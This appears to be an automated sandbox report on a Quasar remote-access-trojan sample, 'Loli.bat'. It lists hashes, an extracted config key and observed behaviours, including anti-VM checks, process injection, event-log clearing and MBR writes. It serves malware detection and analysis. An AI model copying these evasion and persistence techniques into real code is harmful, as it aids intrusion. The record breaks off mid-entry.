Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
25-12-2024 17:41
Static task
static1
Behavioral task
behavioral1
Sample
Loli.bat
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Loli.bat
Resource
win10v2004-20241007-en
General
-
Target
Loli.bat
-
Size
7.4MB
-
MD5
6b47b9a393a85371aae15aa9db27077b
-
SHA1
fe35bc8723726c87e960abc083c08ad444152223
-
SHA256
f8e1178ed62fc639722c51acc76f11eef71b79b6dadb09e47c09bc390769c3b1
-
SHA512
05588b1705a5879342ae111b62fa4df1f2d49e9837c36a6efcbf0674d6cedb4b104a52520284ff34221ba743811e5f084baa088fa8cce1867d242be44e6da847
-
SSDEEP
49152:7OWCuNaj2/KLCKx7QWjOUYFj3OwUWAxzz4N08iUjOq6xbgrbwkvR+if5AZVtlwzX:3
Malware Config
Extracted
quasar
-
encryption_key
02C18A71F848FA646B9434F7491877F6DE4548D5
-
reconnect_delay
3000
Signatures
-
Quasar family
-
Quasar payload 1 IoCs
resource yara_rule behavioral2/memory/4984-2322-0x0000027628070000-0x00000276287F4000-memory.dmp family_quasar -
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
description pid Process procid_target PID 2248 created 1792 2248 WerFault.exe 89 PID 1464 created 4984 1464 WerFault.exe 116 -
Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
description pid Process procid_target PID 1792 created 612 1792 powershell.exe 5 PID 1680 created 1792 1680 svchost.exe 89 PID 4984 created 612 4984 powershell.exe 5 PID 1680 created 4984 1680 svchost.exe 116 PID 1680 created 4984 1680 svchost.exe 116 -
Blocklisted process makes network request 2 IoCs
flow pid Process 34 4984 powershell.exe 40 4984 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 1792 powershell.exe 4984 powershell.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DoSvc\ImagePath = "C:\\Windows\\System32\\svchost.exe -k NetworkService -p" WaaSMedicAgent.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Executes dropped EXE 1 IoCs
pid Process 4348 oAAqwn.exe -
Indicator Removal: Clear Windows Event Logs 1 TTPs 3 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
description ioc Process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WindowsUpdateClient%4Operational.evtx svchost.exe -
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\B: svchost.exe File opened (read-only) \??\E: svchost.exe File opened (read-only) \??\H: svchost.exe File opened (read-only) \??\L: svchost.exe File opened (read-only) \??\Y: svchost.exe File opened (read-only) \??\T: svchost.exe File opened (read-only) \??\A: svchost.exe File opened (read-only) \??\I: svchost.exe File opened (read-only) \??\N: svchost.exe File opened (read-only) \??\O: svchost.exe File opened (read-only) \??\Q: svchost.exe File opened (read-only) \??\R: svchost.exe File opened (read-only) \??\S: svchost.exe File opened (read-only) \??\Z: svchost.exe File opened (read-only) \??\X: svchost.exe File opened (read-only) \??\G: svchost.exe File opened (read-only) \??\J: svchost.exe File opened (read-only) \??\K: svchost.exe File opened (read-only) \??\M: svchost.exe File opened (read-only) \??\P: svchost.exe File opened (read-only) \??\V: svchost.exe File opened (read-only) \??\W: svchost.exe File opened (read-only) \??\U: svchost.exe -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PHYSICALDRIVE0 wmiprvse.exe -
Drops file in System32 directory 18 IoCs
description ioc Process File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A OfficeClickToRun.exe File opened for modification C:\Windows\System32\Tasks\$nya-qwBxPTKq svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\PcaPatchDbTask svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A OfficeClickToRun.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D lsass.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work svchost.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 22 IoCs
pid Process 4984 powershell.exe 4984 powershell.exe 4984 powershell.exe 4984 powershell.exe 4984 powershell.exe 4984 powershell.exe 4984 powershell.exe 4984 powershell.exe 4984 powershell.exe 4984 powershell.exe 4984 powershell.exe 4984 powershell.exe 4984 powershell.exe 4984 powershell.exe 4984 powershell.exe 4984 powershell.exe 4984 powershell.exe 4984 powershell.exe 4984 powershell.exe 4984 powershell.exe 4984 powershell.exe 4984 powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 1792 set thread context of 1020 1792 powershell.exe 90 PID 4984 set thread context of 232 4984 powershell.exe 119 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN powershell.exe -
Drops file in Windows directory 10 IoCs
description ioc Process File opened for modification C:\Windows\WindowsUpdate.log svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log svchost.exe File opened for modification C:\Windows\SoftwareDistribution\ReportingEvents.log svchost.exe File created C:\Windows\$nya-onimai2\oAAqwn.exe powershell.exe File created C:\Windows\$rbx-onimai2\$rbx-CO2.bat cmd.exe File opened for modification C:\Windows\$nya-onimai2 powershell.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.edb svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm svchost.exe File opened for modification C:\Windows\$rbx-onimai2 powershell.exe -
Checks SCSI registry key(s) 3 TTPs 18 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg wmiprvse.exe -
Checks processor information in registry 2 TTPs 19 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 mousocoreworker.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wmiprvse.exe Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier wmiprvse.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information wmiprvse.exe -
Enumerates system info in registry 2 TTPs 7 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs WaaSMedicAgent.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceId = "00188011AD0251C7" mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02vaqivdvisiksqo svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02vaqivdvisiksqo\DeviceId = "<Data LastUpdatedTime=\"1735148512\"><User username=\"02VAQIVDVISIKSQO\"><HardwareInfo BoundTime=\"1735148512\" TpmKeyStateClient=\"1\" TpmKeyStateServer=\"3\" LicenseKeySequence=\"1\" LicenseInstallError=\"0\" LicenseKeyVersion=\"2\"/></User></Data>\r\n" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs WaaSMedicAgent.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02vaqivdvisiksqo\DeviceId = "<Data LastUpdatedTime=\"1735148512\"><User username=\"02VAQIVDVISIKSQO\"/></Data>\r\n" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs WaaSMedicAgent.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02vaqivdvisiksqo\Provision Wednesday, December 25, 2024 17:41:51 = "AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAfYu9oc1am0yvHfxstgb83QAAAAACAAAAAAAQZgAAAAEAACAAAAAkwMcoqyauTGKYSOhc8BDBgwEl8y6G2zKp5J1hW0fBbAAAAAAOgAAAAAIAACAAAAB3nItPZvWgMTlKolI3CynJ3dUk/KWKw1K6+Sf7ftnu0yAAAABVd1NykZbvHVSONCA7rgHfDAYWcUnOsivaYfTTkfnEsUAAAACnlMPEnaGhfbB6FxUVAKd6dOpNk1pprYTcITwOUztCURHddXJVfrVDKze/ZN5N3XMihMlPtY9nObpwd3mUQ1uG" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates WaaSMedicAgent.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02vaqivdvisiksqo\AppIdList = "{AFDA72BF-3409-413A-B54E-2AB8D66A7826};" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs WaaSMedicAgent.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\DeviceLicenseUpdateFailureCount = "0" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02vaqivdvisiksqo\DeviceId = "<Data LastUpdatedTime=\"1735148512\"><User username=\"02VAQIVDVISIKSQO\"><HardwareInfo BoundTime=\"1735148513\" TpmKeyStateClient=\"1\" TpmKeyStateServer=\"3\" LicenseKeySequence=\"1\" LicenseInstallError=\"0\" LicenseKeyVersion=\"2\"/></User></Data>\r\n" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\ValidDeviceId = "02vaqivdvisiksqo" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows mousocoreworker.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property mousocoreworker.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property\00188011AD0251C7 = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb010000007d8bbda1cd5a9b4caf1dfc6cb606fcdd00000000020000000000106600000001000020000000cb663ff67db4c74a6dfb258ba06d75e13c92b2dd4050275b0bfb0402c698164d000000000e80000000020000200000000d50146f611274ce1a7e02e446204ed590be58c1ce1970f8bb6e4f539798e2f3800000008f17d5e44027f8b9974be489a62e8ac0a24d04d8ba4643835d1d2fccd5d9cbf7ff4ea00e2e50ef2dbb63374170cc8604322f5cd873d862eb3fb015cf41bee7b029ac93f65be35d87037cda73734db4ce83c12330c32c269801c8a450dfaac65bd1f054939a1ffcdab1fa1fc9d5516cc2fd0ba82c1dff396b8e628d0823a07f68400000005a78b0cb10a0e8179f046b5a2b83cc7127cde6c0a464f5e79814e5e7f15b45c7f5464413d0a04ba36a4040d1e28effff6e20b273f26a18098678f3b20789ad4a mousocoreworker.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "00188011AD0251C7" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek\CacheStore mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414} mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA WaaSMedicAgent.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceTicket = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb010000007d8bbda1cd5a9b4caf1dfc6cb606fcdd00000000020000000000106600000001000020000000a6fc00856e976cc75cb15115cc93834060c6533a18161c704c2a0ed9b2ef2517000000000e80000000020000200000002990c6c53f74b3cb1e37dd6d7833bf1fa3e0ba5b059f646c708a84068f1c15cdb0030000316cf611dfbd78f1db46ffb243e7ea251d438f24b01dc3ac3ec454b1b1c10ddfaac0624215e9bbb5e7c0e2266e959b9f3d64d134cfbe7c3a26a74d5fc9d6e0746726817ac1c3e336e6b901da2e08940b9041cf25ebdf0d6db2b3caa251cd3f7887d4504c7074a91285c0f7386ba525d72f87715f4fc0776a5236c60b9b5e3fdeed5a9bfabd7d975aa04906b933f131c3acef87ff63cefb6632d6322f484b95cf4b156df270e482e30d668a5c88281dddda967e6f379daf4abb5f634c8f8b9482dd9c8678e7ed9bba6f1fef0b0596ac7817e3174ff02c2d8fa92c564976dcda37bcdf061f6f42c8a3aa6c5e607dcde7de792c49e5db17fd15fcb2e245914a27d978f47c5170286be8c8dff9fc0d84b63b6e8ea917b47a37880a07ec3c15a77774d48c07be0c02b55eb1bae79c6be9de0657bfe2f949c3331f43ab8dbc9dcbdebe56a349c7fb9ed2ebf92579cb86edfb9fbdb81a77852648d218c7991ff06532e1a80922261298ff75ec0adca7cb9e9b1ad73fbb8b61d779d8ff1a1e17319aa0612384502f1edcff38737849b0da938b41ed73130c954bde59794ca7b685153cc722ef8eb8313b0772f132ad70e8fd7b6a570d8d7f35da8891d19f463750028cfeba1018eea78649563a07bbb8d0931fc22d9c92309f9e96a4c6eb5795534decda337eb7408df15144bb8bd4c3fa16a864cc28285a61725d98b3ae6a6a8b2bfb328830e5f9c32ef305ce621b1d2031cb2008a185c6edcf47b6412a8348d907c0d26214fe250497af2543f859a761687e6b7563b31e5b3e21f76f828f12d7def7f1f73e24f7528e0a73bc3195b462d0e92f4d05e2c330f742da1a21e5ccb855da7a66cc9fe68bdf7e3035676f73083d76c5ee5f69a4fdf0a96d11a1c97d026989712ac0d65288f85e6a5482d7c733b3bf21b04d857ccfe0d73b03a67a607121d3f6275a629c1b0123bbabc3b2d9b6b3f6a8ed64d8837c9f7a441e8ebf853f330ee0e7bbb1d12e6c54fe3fde802478e0d50c9eb254102115b2ba85b2e6606bcaa8642585d9aa67bf112771beebe0a4d57ed0105099b837a5f03551fbba7e184b8e3c88ebfbc5b805ab9b84fbe7566f39ebb81243b81f7d5652ee5856e61bee8c8ef9e9ac310f659d34e70ebff13c5da5f3899491d98c6dd4cb780220aea6dbe470637063c2710a7a801839826baf7cdbe0b0db3b048773a0796f5f23b9bfedec8ab7c9c605bf4c362d6b1b4db70acd860a9be4df779696712d15c0158558837c1b320dbf31e68daaed0f9480854dfe23274514903a67650b9f12e575d5ab92f074050a26691714e0d9e6057939cc8c0ae24a40000000bb476c88f60bd50dc30581821296fedf19fdfaa55d1dd12ea428596919d56f9cdd7535cb8ffbc628e5ff7c9e1ce000535a9ff6d0d5247fdd7e8add25b692837d mousocoreworker.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\ApplicationFlags = "1" mousocoreworker.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Wed, 25 Dec 2024 17:43:13 